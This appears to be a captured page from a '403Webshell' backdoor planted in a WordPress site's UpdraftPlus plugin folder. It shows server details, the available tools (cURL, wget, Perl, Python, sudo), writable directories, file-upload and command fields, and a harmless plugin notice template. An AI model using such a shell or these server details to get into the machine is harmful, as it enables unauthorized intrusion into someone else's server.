403Webshell
Server IP : 193.239.44.106  /  Your IP : 216.73.217.113
Web Server : Apache
System : Linux web5 6.18.40-1 #1 SMP PREEMPT_DYNAMIC Sat Jul 25 21:08:44 CEST 2026 x86_64
User :  ( 10117)
PHP Version : 8.2.32
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/virtualki/259324/wp-content/plugins/updraftplus/templates/wp-admin/notices/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/virtualki/259324/wp-content/plugins/updraftplus/templates/wp-admin/notices/report-plain.php
<?php

if (!defined('UPDRAFTPLUS_DIR')) die('No direct access allowed');

if (!empty($prefix)) echo wp_kses_post($prefix).' ';
echo wp_kses_post($title).': ';

echo wp_kses_post($text);

if (!empty($discount_code)) echo esc_html($discount_code).' ';

if (!empty($button_link) && (!empty($button_meta) || !empty($button_text))) {

	echo ' ';

	$link = apply_filters('updraftplus_com_link', $button_link);

	global $updraftplus_admin;
	$updraftplus_admin->include_template(
		'wp-admin/notices/button-label.php',
		false,
		array(
			'button_meta' => isset($button_meta) ? $button_meta : '',
			'button_text' => isset($button_text) ? $button_text : ''
		)
	);

	echo ' - '.esc_url($link);
	echo "\r\n";
	
}

Youez - 2016 - github.com/yon3zu
LinuXploit